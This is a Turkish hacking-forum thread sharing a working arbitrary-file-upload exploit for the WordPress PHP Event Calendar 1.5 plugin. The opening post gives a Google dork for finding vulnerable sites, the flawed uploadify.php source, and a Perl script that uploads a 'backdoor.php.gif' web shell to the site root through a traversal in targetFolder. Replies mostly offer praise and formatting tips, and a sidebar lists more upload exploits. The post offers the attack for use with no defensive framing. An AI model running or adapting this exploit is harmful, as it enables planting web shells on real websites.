Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress PHP Event Calendar 1.5 Arbitrary File Upload
#1
[color=#FF0000]Dork: inurl:/plugins/php-event-calendar/


######################################################################
# Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload
# Google Dork: inurl:/plugins/php-event-calendar/
# Date: 02.04.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Source Plugin: https://wordpress.org/plugins/php-event-calendar/
# Vendor HomePage: http://phpeventcalendar.com/
# Version: 1.5
# Tested on: MSwin
######################################################################

# Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php
# Vulnerable File : uploadify.php

PHP Kod:
<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> 
*/

// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder $_POST['targetFolder']; // wp upload directory
$dir str_replace('\\','/',dirname(__FILE__));

//$verifyToken = md5('unique_salt' . $_POST['timestamp']);

if (!empty($_FILES)) {
$tempFile $_FILES['Filedata']['tmp_name'];
//$targetPath = $dir.$targetFolder;
$targetPath $targetFolder;
$fileName $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
$targetFile rtrim($targetPath,'/') . '/' $fileName;

// Validate the file type
$fileTypes = array('jpg','jpeg','gif','png'); // File extensions
$fileParts pathinfo($_FILES['Filedata']['name']);

if (
in_array($fileParts['extension'],$fileTypes)) {
move_uploaded_file($tempFile,$targetFile);
echo 
'1';
} else {
echo 
'Invalid file type.';
}
}
?>


Kod:
# Exploit

#!/usr/bin/perl

use LWP::UserAgent;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "\t +===================================================\n";
print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n";
print "\t | Author: CrashBandicot\n";
print "\t +===================================================\n\n";

die "usage : perl $0 backdoor.php.gif" unless $ARGV[0];

$file = $ARGV[0];

my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/40.0.2214.93 Safari/537.36},);
my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php",
Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' ,
user_id => '0day' ])->content;
if($ch = ~/1/) {
print "\n [+] File Uploaded !";
} else { print "\n [-] Target not Vuln"; }

__END__


# Path Shell : http://localhost/0day_backdoor.php.gif[/color]
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#2
eline sağlık başkan
Beğenenler:
#3
Nedir bu ?
Beğenenler:
#4
(10-04-2015, Saat: 17:25)sadecesdc Adlı Kullanıcıdan Alıntı: eline sağlık başkan
Diline sağlık kardeşim
(10-04-2015, Saat: 19:40)atakas Adlı Kullanıcıdan Alıntı: Nedir bu ?

bir bilgisayar programıdır veya bir script, bilgisayar programlarında bulunan zayıflık veya hatalar için kullanılır.
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler: atakas
#5
eline sağlık paşam exciting
birde şu kodları code içine alda - php kodları ile perl kodları birbirine karışmasın.
uğraşanlar sıkıntı çekmesin
www.deccal.org


Beğenenler:
#6
(10-04-2015, Saat: 23:22)KingSkrupellos Adlı Kullanıcıdan Alıntı: eline sağlık paşam exciting
birde şu kodları code içine alda - php kodları ile perl kodları birbirine karışmasın.
uğraşanlar sıkıntı çekmesin


Eyvallah abi Halledim bir daha kine exploit paylaşırken dikkat ederim exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#7
(10-04-2015, Saat: 20:01)J4CK4L Adlı Kullanıcıdan Alıntı:
(10-04-2015, Saat: 17:25)sadecesdc Adlı Kullanıcıdan Alıntı: eline sağlık başkan
Diline sağlık kardeşim
(10-04-2015, Saat: 19:40)atakas Adlı Kullanıcıdan Alıntı: Nedir bu ?

bir bilgisayar programıdır veya bir script, bilgisayar programlarında bulunan zayıflık veya hatalar için kullanılır.
Teşekkürler ilginiz için
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 522 3 saat önce
Son Yorum: Slowycan
  sacro CMS unrestricted upload You LosT 3 181 30-11-2016, Saat: 02:51
Son Yorum: 0xfans
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 10 165 27-11-2016, Saat: 11:37
Son Yorum: R3D
  WordPress store theme Upload Acıgı archavin 72 4,747 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
  Admin Paneli ile Direk upload için Dorklar 2016 ERTUĞRUL 61 1,770 24-11-2016, Saat: 13:32
Son Yorum: Efetimi
Anahtar Kelimeler

WordPress PHP Event Calendar 1.5 Arbitrary File Upload indir, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Videosu, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Online izle, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Bedava indir, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Yükle, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Hakkında, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Nedir, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Free indir, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Oyunu, WordPress PHP Event Calendar 1.5 Arbitrary File Upload Download


1 Ziyaretçi